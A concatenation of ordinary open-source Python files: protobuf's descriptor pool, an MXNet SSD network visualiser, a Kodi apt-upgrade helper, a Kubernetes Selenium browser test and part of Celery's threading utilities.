MessageSet extensions with the type name. if _IsMessageSetExtension(extension): self._extensions_by_name[extension.containing_type][ extension.message_type.full_name] = extension @_Deprecated def AddFileDescriptor(self, file_desc): self._InternalAddFileDescriptor(file_desc) # Never call this method. It is for internal usage only. def _InternalAddFileDescriptor(self, file_desc): """Adds a FileDescriptor to the pool, non-recursively. If the FileDescriptor contains messages or enums, the caller must explicitly register them. Args: file_desc: A FileDescriptor. """ self._AddFileDescriptor(file_desc) # TODO(jieluo): This is a temporary solution for FieldDescriptor.file. # FieldDescriptor.file is added in code gen. Remove this solution after # maybe 2020 for compatibility reason (with 3.4.1 only). for extension in file_desc.extensions_by_name.values(): self._file_desc_by_toplevel_extension[ extension.full_name] = file_desc def _AddFileDescriptor(self, file_desc): """Adds a FileDescriptor to the pool, non-recursively. If the FileDescriptor contains messages or enums, the caller must explicitly register them. Args: file_desc: A FileDescriptor. """ if not isinstance(file_desc, descriptor.FileDescriptor): raise TypeError('Expected instance of descriptor.FileDescriptor.') self._file_descriptors[file_desc.name] = file_desc def FindFileByName(self, file_name): """Gets a FileDescriptor by file name. Args: file_name (str): The path to the file to get a descriptor for. Returns: FileDescriptor: The descriptor for the named file. Raises: KeyError: if the file cannot be found in the pool. 
""" try: return self._file_descriptors[file_name] except KeyError: pass try: file_proto = self._internal_db.FindFileByName(file_name) except KeyError as error: if self._descriptor_db: file_proto = self._descriptor_db.FindFileByName(file_name) else: raise error if not file_proto: raise KeyError('Cannot find a file named %s' % file_name) return self._ConvertFileProtoToFileDescriptor(file_proto) def FindFileContainingSymbol(self, symbol): """Gets the FileDescriptor for the file containing the specified symbol. Args: symbol (str): The name of the symbol to search for. Returns: FileDescriptor: Descriptor for the file that contains the specified symbol. Raises: KeyError: if the file cannot be found in the pool. """ symbol = _NormalizeFullyQualifiedName(symbol) try: return self._InternalFindFileContainingSymbol(symbol) except KeyError: pass try: # Try fallback database. Build and find again if possible. self._FindFileContainingSymbolInDb(symbol) return self._InternalFindFileContainingSymbol(symbol) except KeyError: raise KeyError('Cannot find a file containing %s' % symbol) def _InternalFindFileContainingSymbol(self, symbol): """Gets the already built FileDescriptor containing the specified symbol. Args: symbol (str): The name of the symbol to search for. Returns: FileDescriptor: Descriptor for the file that contains the specified symbol. Raises: KeyError: if the file cannot be found in the pool. """ try: return self._descriptors[symbol].file except KeyError: pass try: return self._enum_descriptors[symbol].file except KeyError: pass try: return self._service_descriptors[symbol].file except KeyError: pass try: return self._top_enum_values[symbol].type.file except KeyError: pass try: return self._file_desc_by_toplevel_extension[symbol] except KeyError: pass # Try fields, enum values and nested extensions inside a message. top_name, _, sub_name = symbol.rpartition('.') try: message = self.FindMessageTypeByName(top_name) assert (sub_name in message.extensions_by_name or sub_name in message.fields_by_name or sub_name in message.enum_values_by_name) return message.file except (KeyError, AssertionError): raise KeyError('Cannot find a file containing %s' % symbol) def FindMessageTypeByName(self, full_name): """Loads the named descriptor from the pool. Args: full_name (str): The full name of the descriptor to load. Returns: Descriptor: The descriptor for the named type. Raises: KeyError: if the message cannot be found in the pool. """ full_name = _NormalizeFullyQualifiedName(full_name) if full_name not in self._descriptors: self._FindFileContainingSymbolInDb(full_name) return self._descriptors[full_name] def FindEnumTypeByName(self, full_name): """Loads the named enum descriptor from the pool. Args: full_name (str): The full name of the enum descriptor to load. Returns: EnumDescriptor: The enum descriptor for the named type. Raises: KeyError: if the enum cannot be found in the pool. """ full_name = _NormalizeFullyQualifiedName(full_name) if full_name not in self._enum_descriptors: self._FindFileContainingSymbolInDb(full_name) return self._enum_descriptors[full_name] def FindFieldByName(self, full_name): """Loads the named field descriptor from the pool. Args: full_name (str): The full name of the field descriptor to load. Returns: FieldDescriptor: The field descriptor for the named field. Raises: KeyError: if the field cannot be found in the pool. 
""" full_name = _NormalizeFullyQualifiedName(full_name) message_name, _, field_name = full_name.rpartition('.') message_descriptor = self.FindMessageTypeByName(message_name) return message_descriptor.fields_by_name[field_name] def FindOneofByName(self, full_name): """Loads the named oneof descriptor from the pool. Args: full_name (str): The full name of the oneof descriptor to load. Returns: OneofDescriptor: The oneof descriptor for the named oneof. Raises: KeyError: if the oneof cannot be found in the pool. """ full_name = _NormalizeFullyQualifiedName(full_name) message_name, _, oneof_name = full_name.rpartition('.') message_descriptor = self.FindMessageTypeByName(message_name) return message_descriptor.oneofs_by_name[oneof_name] def FindExtensionByName(self, full_name): """Loads the named extension descriptor from the pool. Args: full_name (str): The full name of the extension descriptor to load. Returns: FieldDescriptor: The field descriptor for the named extension. Raises: KeyError: if the extension cannot be found in the pool. """ full_name = _NormalizeFullyQualifiedName(full_name) try: # The proto compiler does not give any link between the FileDescriptor # and top-level extensions unless the FileDescriptorProto is added to # the DescriptorDatabase, but this can impact memory usage. # So we registered these extensions by name explicitly. return self._toplevel_extensions[full_name] except KeyError: pass message_name, _, extension_name = full_name.rpartition('.') try: # Most extensions are nested inside a message. scope = self.FindMessageTypeByName(message_name) except KeyError: # Some extensions are defined at file scope. scope = self._FindFileContainingSymbolInDb(full_name) return scope.extensions_by_name[extension_name] def FindExtensionByNumber(self, message_descriptor, number): """Gets the extension of the specified message with the specified number. Extensions have to be registered to this pool by calling :func:`Add` or :func:`AddExtensionDescriptor`. Args: message_descriptor (Descriptor): descriptor of the extended message. number (int): Number of the extension field. Returns: FieldDescriptor: The descriptor for the extension. Raises: KeyError: when no extension with the given number is known for the specified message. """ try: return self._extensions_by_number[message_descriptor][number] except KeyError: self._TryLoadExtensionFromDB(message_descriptor, number) return self._extensions_by_number[message_descriptor][number] def FindAllExtensions(self, message_descriptor): """Gets all the known extensions of a given message. Extensions have to be registered to this pool by build related :func:`Add` or :func:`AddExtensionDescriptor`. Args: message_descriptor (Descriptor): Descriptor of the extended message. Returns: list[FieldDescriptor]: Field descriptors describing the extensions. """ # Fallback to descriptor db if FindAllExtensionNumbers is provided. if self._descriptor_db and hasattr( self._descriptor_db, 'FindAllExtensionNumbers'): full_name = message_descriptor.full_name all_numbers = self._descriptor_db.FindAllExtensionNumbers(full_name) for number in all_numbers: if number in self._extensions_by_number[message_descriptor]: continue self._TryLoadExtensionFromDB(message_descriptor, number) return list(self._extensions_by_number[message_descriptor].values()) def _TryLoadExtensionFromDB(self, message_descriptor, number): """Try to Load extensions from descriptor db. Args: message_descriptor: descriptor of the extended message. 
number: the extension number that needs to be loaded. """ if not self._descriptor_db: return # Only supported when FindFileContainingExtension is provided. if not hasattr( self._descriptor_db, 'FindFileContainingExtension'): return full_name = message_descriptor.full_name file_proto = self._descriptor_db.FindFileContainingExtension( full_name, number) if file_proto is None: return try: self._ConvertFileProtoToFileDescriptor(file_proto) except: warn_msg = ('Unable to load proto file %s for extension number %d.' % (file_proto.name, number)) warnings.warn(warn_msg, RuntimeWarning) def FindServiceByName(self, full_name): """Loads the named service descriptor from the pool. Args: full_name (str): The full name of the service descriptor to load. Returns: ServiceDescriptor: The service descriptor for the named service. Raises: KeyError: if the service cannot be found in the pool. """ full_name = _NormalizeFullyQualifiedName(full_name) if full_name not in self._service_descriptors: self._FindFileContainingSymbolInDb(full_name) return self._service_descriptors[full_name] def FindMethodByName(self, full_name): """Loads the named service method descriptor from the pool. Args: full_name (str): The full name of the method descriptor to load. Returns: MethodDescriptor: The method descriptor for the service method. Raises: KeyError: if the method cannot be found in the pool. """ full_name = _NormalizeFullyQualifiedName(full_name) service_name, _, method_name = full_name.rpartition('.') service_descriptor = self.FindServiceByName(service_name) return service_descriptor.methods_by_name[method_name] def _FindFileContainingSymbolInDb(self, symbol): """Finds the file in descriptor DB containing the specified symbol. Args: symbol (str): The name of the symbol to search for. Returns: FileDescriptor: The file that contains the specified symbol. Raises: KeyError: if the file cannot be found in the descriptor database. """ try: file_proto = self._internal_db.FindFileContainingSymbol(symbol) except KeyError as error: if self._descriptor_db: file_proto = self._descriptor_db.FindFileContainingSymbol(symbol) else: raise error if not file_proto: raise KeyError('Cannot find a file containing %s' % symbol) return self._ConvertFileProtoToFileDescriptor(file_proto) def _ConvertFileProtoToFileDescriptor(self, file_proto): """Creates a FileDescriptor from a proto or returns a cached copy. This method also has the side effect of loading all the symbols found in the file into the appropriate dictionaries in the pool. Args: file_proto: The proto to convert. Returns: A FileDescriptor matching the passed in proto. """ if file_proto.name not in self._file_descriptors: built_deps = list(self._GetDeps(file_proto.dependency)) direct_deps = [self.FindFileByName(n) for n in file_proto.dependency] public_deps = [direct_deps[i] for i in file_proto.public_dependency] file_descriptor = descriptor.FileDescriptor( pool=self, name=file_proto.name, package=file_proto.package, syntax=file_proto.syntax, options=_OptionsOrNone(file_proto), serialized_pb=file_proto.SerializeToString(), dependencies=direct_deps, public_dependencies=public_deps, # pylint: disable=protected-access create_key=descriptor._internal_create_key) scope = {} # This loop extracts all the message and enum types from all the # dependencies of the file_proto. This is necessary to create the # scope of available message types when defining the passed in # file proto. 
for dependency in built_deps: scope.update(self._ExtractSymbols( dependency.message_types_by_name.values())) scope.update((_PrefixWithDot(enum.full_name), enum) for enum in dependency.enum_types_by_name.values()) for message_type in file_proto.message_type: message_desc = self._ConvertMessageDescriptor( message_type, file_proto.package, file_descriptor, scope, file_proto.syntax) file_descriptor.message_types_by_name[message_desc.name] = ( message_desc) for enum_type in file_proto.enum_type: file_descriptor.enum_types_by_name[enum_type.name] = ( self._ConvertEnumDescriptor(enum_type, file_proto.package, file_descriptor, None, scope, True)) for index, extension_proto in enumerate(file_proto.extension): extension_desc = self._MakeFieldDescriptor( extension_proto, file_proto.package, index, file_descriptor, is_extension=True) extension_desc.containing_type = self._GetTypeFromScope( file_descriptor.package, extension_proto.extendee, scope) self._SetFieldType(extension_proto, extension_desc, file_descriptor.package, scope) file_descriptor.extensions_by_name[extension_desc.name] = ( extension_desc) self._file_desc_by_toplevel_extension[extension_desc.full_name] = ( file_descriptor) for desc_proto in file_proto.message_type: self._SetAllFieldTypes(file_proto.package, desc_proto, scope) if file_proto.package: desc_proto_prefix = _PrefixWithDot(file_proto.package) else: desc_proto_prefix = '' for desc_proto in file_proto.message_type: desc = self._GetTypeFromScope( desc_proto_prefix, desc_proto.name, scope) file_descriptor.message_types_by_name[desc_proto.name] = desc for index, service_proto in enumerate(file_proto.service): file_descriptor.services_by_name[service_proto.name] = ( self._MakeServiceDescriptor(service_proto, index, scope, file_proto.package, file_descriptor)) self.Add(file_proto) self._file_descriptors[file_proto.name] = file_descriptor # Add extensions to the pool file_desc = self._file_descriptors[file_proto.name] for extension in file_desc.extensions_by_name.values(): self._AddExtensionDescriptor(extension) for message_type in file_desc.message_types_by_name.values(): for extension in message_type.extensions: self._AddExtensionDescriptor(extension) return file_desc def _ConvertMessageDescriptor(self, desc_proto, package=None, file_desc=None, scope=None, syntax=None): """Adds the proto to the pool in the specified package. Args: desc_proto: The descriptor_pb2.DescriptorProto protobuf message. package: The package the proto should be located in. file_desc: The file containing this message. scope: Dict mapping short and full symbols to message and enum types. syntax: string indicating syntax of the file ("proto2" or "proto3") Returns: The added descriptor. 
""" if package: desc_name = '.'.join((package, desc_proto.name)) else: desc_name = desc_proto.name if file_desc is None: file_name = None else: file_name = file_desc.name if scope is None: scope = {} nested = [ self._ConvertMessageDescriptor( nested, desc_name, file_desc, scope, syntax) for nested in desc_proto.nested_type] enums = [ self._ConvertEnumDescriptor(enum, desc_name, file_desc, None, scope, False) for enum in desc_proto.enum_type] fields = [self._MakeFieldDescriptor(field, desc_name, index, file_desc) for index, field in enumerate(desc_proto.field)] extensions = [ self._MakeFieldDescriptor(extension, desc_name, index, file_desc, is_extension=True) for index, extension in enumerate(desc_proto.extension)] oneofs = [ # pylint: disable=g-complex-comprehension descriptor.OneofDescriptor(desc.name, '.'.join((desc_name, desc.name)), index, None, [], desc.options, # pylint: disable=protected-access create_key=descriptor._internal_create_key) for index, desc in enumerate(desc_proto.oneof_decl)] extension_ranges = [(r.start, r.end) for r in desc_proto.extension_range] if extension_ranges: is_extendable = True else: is_extendable = False desc = descriptor.Descriptor( name=desc_proto.name, full_name=desc_name, filename=file_name, containing_type=None, fields=fields, oneofs=oneofs, nested_types=nested, enum_types=enums, extensions=extensions, options=_OptionsOrNone(desc_proto), is_extendable=is_extendable, extension_ranges=extension_ranges, file=file_desc, serialized_start=None, serialized_end=None, syntax=syntax, # pylint: disable=protected-access create_key=descriptor._internal_create_key) for nested in desc.nested_types: nested.containing_type = desc for enum in desc.enum_types: enum.containing_type = desc for field_index, field_desc in enumerate(desc_proto.field): if field_desc.HasField('oneof_index'): oneof_index = field_desc.oneof_index oneofs[oneof_index].fields.append(fields[field_index]) fields[field_index].containing_oneof = oneofs[oneof_index] scope[_PrefixWithDot(desc_name)] = desc self._CheckConflictRegister(desc, desc.full_name, desc.file.name) self._descriptors[desc_name] = desc return desc def _ConvertEnumDescriptor(self, enum_proto, package=None, file_desc=None, containing_type=None, scope=None, top_level=False): """Make a protobuf EnumDescriptor given an EnumDescriptorProto protobuf. Args: enum_proto: The descriptor_pb2.EnumDescriptorProto protobuf message. package: Optional package name for the new message EnumDescriptor. file_desc: The file containing the enum descriptor. containing_type: The type containing this enum. scope: Scope containing available types. top_level: If True, the enum is a top level symbol. If False, the enum is defined inside a message. Returns: The added descriptor """ if package: enum_name = '.'.join((package, enum_proto.name)) else: enum_name = enum_proto.name if file_desc is None: file_name = None else: file_name = file_desc.name values = [self._MakeEnumValueDescriptor(value, index) for index, value in enumerate(enum_proto.value)] desc = descriptor.EnumDescriptor(name=enum_proto.name, full_name=enum_name, filename=file_name, file=file_desc, values=values, containing_type=containing_type, options=_OptionsOrNone(enum_proto), # pylint: disable=protected-access create_key=descriptor._internal_create_key) scope['.%s' % enum_name] = desc self._CheckConflictRegister(desc, desc.full_name, desc.file.name) self._enum_descriptors[enum_name] = desc # Add top level enum values. 
if top_level: for value in values: full_name = _NormalizeFullyQualifiedName( '.'.join((package, value.name))) self._CheckConflictRegister(value, full_name, file_name) self._top_enum_values[full_name] = value return desc def _MakeFieldDescriptor(self, field_proto, message_name, index, file_desc, is_extension=False): """Creates a field descriptor from a FieldDescriptorProto. For message and enum type fields, this method will do a look up in the pool for the appropriate descriptor for that type. If it is unavailable, it will fall back to the _source function to create it. If this type is still unavailable, construction will fail. Args: field_proto: The proto describing the field. message_name: The name of the containing message. index: Index of the field file_desc: The file containing the field descriptor. is_extension: Indication that this field is for an extension. Returns: An initialized FieldDescriptor object """ if message_name: full_name = '.'.join((message_name, field_proto.name)) else: full_name = field_proto.name return descriptor.FieldDescriptor( name=field_proto.name, full_name=full_name, index=index, number=field_proto.number, type=field_proto.type, cpp_type=None, message_type=None, enum_type=None, containing_type=None, label=field_proto.label, has_default_value=False, default_value=None, is_extension=is_extension, extension_scope=None, options=_OptionsOrNone(field_proto), file=file_desc, # pylint: disable=protected-access create_key=descriptor._internal_create_key) def _SetAllFieldTypes(self, package, desc_proto, scope): """Sets all the descriptor's fields's types. This method also sets the containing types on any extensions. Args: package: The current package of desc_proto. desc_proto: The message descriptor to update. scope: Enclosing scope of available types. """ package = _PrefixWithDot(package) main_desc = self._GetTypeFromScope(package, desc_proto.name, scope) if package == '.': nested_package = _PrefixWithDot(desc_proto.name) else: nested_package = '.'.join([package, desc_proto.name]) for field_proto, field_desc in zip(desc_proto.field, main_desc.fields): self._SetFieldType(field_proto, field_desc, nested_package, scope) for extension_proto, extension_desc in ( zip(desc_proto.extension, main_desc.extensions)): extension_desc.containing_type = self._GetTypeFromScope( nested_package, extension_proto.extendee, scope) self._SetFieldType(extension_proto, extension_desc, nested_package, scope) for nested_type in desc_proto.nested_type: self._SetAllFieldTypes(nested_package, nested_type, scope) def _SetFieldType(self, field_proto, field_desc, package, scope): """Sets the field's type, cpp_type, message_type and enum_type. Args: field_proto: Data about the field in proto format. field_desc: The descriptor to modify. package: The package the field's container is in. scope: Enclosing scope of available types. 
""" if field_proto.type_name: desc = self._GetTypeFromScope(package, field_proto.type_name, scope) else: desc = None if not field_proto.HasField('type'): if isinstance(desc, descriptor.Descriptor): field_proto.type = descriptor.FieldDescriptor.TYPE_MESSAGE else: field_proto.type = descriptor.FieldDescriptor.TYPE_ENUM field_desc.cpp_type = descriptor.FieldDescriptor.ProtoTypeToCppProtoType( field_proto.type) if (field_proto.type == descriptor.FieldDescriptor.TYPE_MESSAGE or field_proto.type == descriptor.FieldDescriptor.TYPE_GROUP): field_desc.message_type = desc if field_proto.type == descriptor.FieldDescriptor.TYPE_ENUM: field_desc.enum_type = desc if field_proto.label == descriptor.FieldDescriptor.LABEL_REPEATED: field_desc.has_default_value = False field_desc.default_value = [] elif field_proto.HasField('default_value'): field_desc.has_default_value = True if (field_proto.type == descriptor.FieldDescriptor.TYPE_DOUBLE or field_proto.type == descriptor.FieldDescriptor.TYPE_FLOAT): field_desc.default_value = float(field_proto.default_value) elif field_proto.type == descriptor.FieldDescriptor.TYPE_STRING: field_desc.default_value = field_proto.default_value elif field_proto.type == descriptor.FieldDescriptor.TYPE_BOOL: field_desc.default_value = field_proto.default_value.lower() == 'true' elif field_proto.type == descriptor.FieldDescriptor.TYPE_ENUM: field_desc.default_value = field_desc.enum_type.values_by_name[ field_proto.default_value].number elif field_proto.type == descriptor.FieldDescriptor.TYPE_BYTES: field_desc.default_value = text_encoding.CUnescape( field_proto.default_value) elif field_proto.type == descriptor.FieldDescriptor.TYPE_MESSAGE: field_desc.default_value = None else: # All other types are of the "int" type. field_desc.default_value = int(field_proto.default_value) else: field_desc.has_default_value = False if (field_proto.type == descriptor.FieldDescriptor.TYPE_DOUBLE or field_proto.type == descriptor.FieldDescriptor.TYPE_FLOAT): field_desc.default_value = 0.0 elif field_proto.type == descriptor.FieldDescriptor.TYPE_STRING: field_desc.default_value = u'' elif field_proto.type == descriptor.FieldDescriptor.TYPE_BOOL: field_desc.default_value = False elif field_proto.type == descriptor.FieldDescriptor.TYPE_ENUM: field_desc.default_value = field_desc.enum_type.values[0].number elif field_proto.type == descriptor.FieldDescriptor.TYPE_BYTES: field_desc.default_value = b'' elif field_proto.type == descriptor.FieldDescriptor.TYPE_MESSAGE: field_desc.default_value = None else: # All other types are of the "int" type. field_desc.default_value = 0 field_desc.type = field_proto.type def _MakeEnumValueDescriptor(self, value_proto, index): """Creates a enum value descriptor object from a enum value proto. Args: value_proto: The proto describing the enum value. index: The index of the enum value. Returns: An initialized EnumValueDescriptor object. """ return descriptor.EnumValueDescriptor( name=value_proto.name, index=index, number=value_proto.number, options=_OptionsOrNone(value_proto), type=None, # pylint: disable=protected-access create_key=descriptor._internal_create_key) def _MakeServiceDescriptor(self, service_proto, service_index, scope, package, file_desc): """Make a protobuf ServiceDescriptor given a ServiceDescriptorProto. Args: service_proto: The descriptor_pb2.ServiceDescriptorProto protobuf message. service_index: The index of the service in the File. scope: Dict mapping short and full symbols to message and enum types. 
package: Optional package name for the new message EnumDescriptor. file_desc: The file containing the service descriptor. Returns: The added descriptor. """ if package: service_name = '.'.join((package, service_proto.name)) else: service_name = service_proto.name methods = [self._MakeMethodDescriptor(method_proto, service_name, package, scope, index) for index, method_proto in enumerate(service_proto.method)] desc = descriptor.ServiceDescriptor( name=service_proto.name, full_name=service_name, index=service_index, methods=methods, options=_OptionsOrNone(service_proto), file=file_desc, # pylint: disable=protected-access create_key=descriptor._internal_create_key) self._CheckConflictRegister(desc, desc.full_name, desc.file.name) self._service_descriptors[service_name] = desc return desc def _MakeMethodDescriptor(self, method_proto, service_name, package, scope, index): """Creates a method descriptor from a MethodDescriptorProto. Args: method_proto: The proto describing the method. service_name: The name of the containing service. package: Optional package name to look up for types. scope: Scope containing available types. index: Index of the method in the service. Returns: An initialized MethodDescriptor object. """ full_name = '.'.join((service_name, method_proto.name)) input_type = self._GetTypeFromScope( package, method_proto.input_type, scope) output_type = self._GetTypeFromScope( package, method_proto.output_type, scope) return descriptor.MethodDescriptor( name=method_proto.name, full_name=full_name, index=index, containing_service=None, input_type=input_type, output_type=output_type, options=_OptionsOrNone(method_proto), # pylint: disable=protected-access create_key=descriptor._internal_create_key) def _ExtractSymbols(self, descriptors): """Pulls out all the symbols from descriptor protos. Args: descriptors: The messages to extract descriptors from. Yields: A two element tuple of the type name and descriptor object. """ for desc in descriptors: yield (_PrefixWithDot(desc.full_name), desc) for symbol in self._ExtractSymbols(desc.nested_types): yield symbol for enum in desc.enum_types: yield (_PrefixWithDot(enum.full_name), enum) def _GetDeps(self, dependencies): """Recursively finds dependencies for file protos. Args: dependencies: The names of the files being depended on. Yields: Each direct and indirect dependency. """ for dependency in dependencies: dep_desc = self.FindFileByName(dependency) yield dep_desc for parent_dep in dep_desc.dependencies: yield parent_dep def _GetTypeFromScope(self, package, type_name, scope): """Finds a given type name in the current scope. Args: package: The package the proto should be located in. type_name: The name of the type to be found in the scope. scope: Dict mapping short and full symbols to message and enum types. Returns: The descriptor for the requested type. """ if type_name not in scope: components = _PrefixWithDot(package).split('.') while components: possible_match = '.'.join(components + [type_name]) if possible_match in scope: type_name = possible_match break else: components.pop(-1) return scope[type_name] def _PrefixWithDot(name): return name if name.startswith('.') else '.%s' % name if _USE_C_DESCRIPTORS: # TODO(amauryfa): This pool could be constructed from Python code, when we # support a flag like 'use_cpp_generated_pool=True'. # pylint: disable=protected-access _DEFAULT = descriptor._message.default_pool else: _DEFAULT = DescriptorPool() def Default(): return _DEFAULT
apache-2.0
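The module docstring above shows the intended usage: build FileDescriptorProto messages, Add() them to a pool, then look descriptors up by full name. A small sketch using only methods defined in the file (Add, FindMessageTypeByName, FindFieldByName); the proto file name and message are made up for illustration:
from google.protobuf import descriptor_pb2
from google.protobuf import descriptor_pool

# Describe a tiny proto file with one message and one string field.
file_proto = descriptor_pb2.FileDescriptorProto()
file_proto.name = 'example/person.proto'
file_proto.package = 'example'

message_proto = file_proto.message_type.add()
message_proto.name = 'Person'

field_proto = message_proto.field.add()
field_proto.name = 'name'
field_proto.number = 1
field_proto.type = descriptor_pb2.FieldDescriptorProto.TYPE_STRING
field_proto.label = descriptor_pb2.FieldDescriptorProto.LABEL_OPTIONAL

# Register it in a fresh pool and resolve descriptors by full name.
pool = descriptor_pool.DescriptorPool()
pool.Add(file_proto)

person_desc = pool.FindMessageTypeByName('example.Person')
name_field = pool.FindFieldByName('example.Person.name')
print(person_desc.full_name, name_field.number)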
Ldpe2G/mxnet
example/ssd/tools/visualize_net.py
10
1148
from __future__ import print_function import find_mxnet import mxnet as mx import importlib import argparse import sys parser = argparse.ArgumentParser(description='network visualization') parser.add_argument('--network', type=str, default='vgg16_ssd_300', choices = ['vgg16_ssd_300', 'vgg16_ssd_512'], help = 'the cnn to use') parser.add_argument('--num-classes', type=int, default=20, help='the number of classes') parser.add_argument('--data-shape', type=int, default=300, help='set image\'s shape') parser.add_argument('--train', action='store_true', default=False, help='show train net') args = parser.parse_args() sys.path.append('../symbol') if not args.train: net = importlib.import_module("symbol_" + args.network).get_symbol(args.num_classes) a = mx.viz.plot_network(net, shape={"data":(1,3,args.data_shape,args.data_shape)}, \ node_attrs={"shape":'rect', "fixedsize":'false'}) a.render("ssd_" + args.network) else: net = importlib.import_module("symbol_" + args.network).get_symbol_train(args.num_classes) print(net.tojson())
apache-2.0
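visualize_net.py wraps mx.viz.plot_network around the SSD symbols. A minimal standalone call on a toy symbol, using the same shape and node_attrs arguments; the layer names are illustrative:
import mxnet as mx

data = mx.sym.Variable('data')
fc1 = mx.sym.FullyConnected(data=data, num_hidden=64, name='fc1')
act1 = mx.sym.Activation(data=fc1, act_type='relu', name='relu1')
out = mx.sym.SoftmaxOutput(data=act1, name='softmax')

# shape drives shape inference so node labels include tensor sizes.
graph = mx.viz.plot_network(out, shape={'data': (1, 784)},
                            node_attrs={'shape': 'rect', 'fixedsize': 'false'})
graph.render('toy_net')  # writes toy_net.pdf via graphviz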
atupone/xbmc
addons/service.xbmc.versioncheck/lib/aptdeamonhandler.py
177
3661
# -*- coding: utf-8 -*- # # Copyright (C) 2013 Team-XBMC # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # import xbmc from common import * try: #import apt import apt from aptdaemon import client from aptdaemon import errors except: log('python apt import error') class AptdeamonHandler: def __init__(self): self.aptclient = client.AptClient() def _check_versions(self, package): if not self._update_cache(): return False, False try: trans = self.aptclient.upgrade_packages([package]) #trans = self.aptclient.upgrade_packages("bla") trans.simulate(reply_handler=self._apttransstarted, error_handler=self._apterrorhandler) pkg = trans.packages[4][0] if pkg == package: cache=apt.Cache() cache.open(None) cache.upgrade() if cache[pkg].installed: return cache[pkg].installed.version, cache[pkg].candidate.version return False, False except Exception as error: log("Exception while checking versions: %s" %error) return False, False def _update_cache(self): try: if self.aptclient.update_cache(wait=True) == "exit-success": return True else: return False except errors.NotAuthorizedError: log("You are not allowed to update the cache") return False def check_upgrade_available(self, package): '''returns True if newer package is available in the repositories''' installed, candidate = self._check_versions(package) if installed and candidate: if installed != candidate: log("Version installed %s" %installed) log("Version available %s" %candidate) return True else: log("Already on newest version") elif not installed: log("No installed package found") return False else: return False def upgrade_package(self, package): try: log("Installing new version") if self.aptclient.upgrade_packages([package], wait=True) == "exit-success": log("Upgrade successful") return True except Exception as error: log("Exception during upgrade: %s" %error) return False def upgrade_system(self): try: log("Upgrading system") if self.aptclient.upgrade_system(wait=True) == "exit-success": return True except Exception as error: log("Exception during system upgrade: %s" %error) return False def _getpassword(self): if len(self._pwd) == 0: self._pwd = get_password_from_user() return self._pwd def _apttransstarted(self): pass def _apterrorhandler(self, error): log("Apt Error %s" %error)
gpl-2.0
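A minimal usage sketch for the AptdeamonHandler class above. It can only run inside the Kodi/XBMC add-on environment (the module imports xbmc and the add-on's common helpers), and both the import path and the package name "kodi" are assumptions made for illustration:

# Hypothetical driver for AptdeamonHandler; requires aptdaemon and the Kodi add-on runtime.
from lib.aptdeamonhandler import AptdeamonHandler   # import path assumed from the file location

handler = AptdeamonHandler()
if handler.check_upgrade_available("kodi"):          # package name is illustrative
    handler.upgrade_package("kodi")                  # returns True on "exit-success"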
slaws/kubernetes
examples/selenium/selenium-test.py
173
1109
#!/usr/bin/env python # Copyright 2015 The Kubernetes Authors All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from selenium import webdriver from selenium.webdriver.common.desired_capabilities import DesiredCapabilities def check_browser(browser): driver = webdriver.Remote( command_executor='http://selenium-hub:4444/wd/hub', desired_capabilities=getattr(DesiredCapabilities, browser) ) driver.get("http://google.com") assert "google" in driver.page_source driver.close() print("Browser %s checks out!" % browser) check_browser("FIREFOX") check_browser("CHROME")
apache-2.0
johankaito/fufuka
microblog/flask/venv/lib/python2.7/site-packages/celery/utils/threads.py
9
9636
# -*- coding: utf-8 -*- """ celery.utils.threads ~~~~~~~~~~~~~~~~~~~~ Threading utilities. """ from __future__ import absolute_import, print_function import os import socket import sys import threading import traceback from contextlib import contextmanager from celery.local import Proxy from celery.five import THREAD_TIMEOUT_MAX, items __all__ = ['bgThread', 'Local', 'LocalStack', 'LocalManager', 'get_ident', 'default_socket_timeout'] USE_FAST_LOCALS = os.environ.get('USE_FAST_LOCALS') PY3 = sys.version_info[0] == 3 @contextmanager def default_socket_timeout(timeout): prev = socket.getdefaulttimeout() socket.setdefaulttimeout(timeout) yield socket.setdefaulttimeout(prev) class bgThread(threading.Thread): def __init__(self, name=None, **kwargs): super(bgThread, self).__init__() self._is_shutdown = threading.Event() self._is_stopped = threading.Event() self.daemon = True self.name = name or self.__class__.__name__ def body(self): raise NotImplementedError('subclass responsibility') def on_crash(self, msg, *fmt, **kwargs): print(msg.format(*fmt), file=sys.stderr) exc_info = sys.exc_info() try: traceback.print_exception(exc_info[0], exc_info[1], exc_info[2], None, sys.stderr) finally: del(exc_info) def run(self): body = self.body shutdown_set = self._is_shutdown.is_set try: while not shutdown_set(): try: body() except Exception as exc: try: self.on_crash('{0!r} crashed: {1!r}', self.name, exc) self._set_stopped() finally: os._exit(1) # exiting by normal means won't work finally: self._set_stopped() def _set_stopped(self): try: self._is_stopped.set() except TypeError: # pragma: no cover # we lost the race at interpreter shutdown, # so gc collected built-in modules. pass def stop(self): """Graceful shutdown.""" self._is_shutdown.set() self._is_stopped.wait() if self.is_alive(): self.join(THREAD_TIMEOUT_MAX) try: from greenlet import getcurrent as get_ident except ImportError: # pragma: no cover try: from _thread import get_ident # noqa except ImportError: try: from thread import get_ident # noqa except ImportError: # pragma: no cover try: from _dummy_thread import get_ident # noqa except ImportError: from dummy_thread import get_ident # noqa def release_local(local): """Releases the contents of the local for the current context. This makes it possible to use locals without a manager. Example:: >>> loc = Local() >>> loc.foo = 42 >>> release_local(loc) >>> hasattr(loc, 'foo') False With this function one can release :class:`Local` objects as well as :class:`StackLocal` objects. However it is not possible to release data held by proxies that way, one always has to retain a reference to the underlying local object in order to be able to release it. .. 
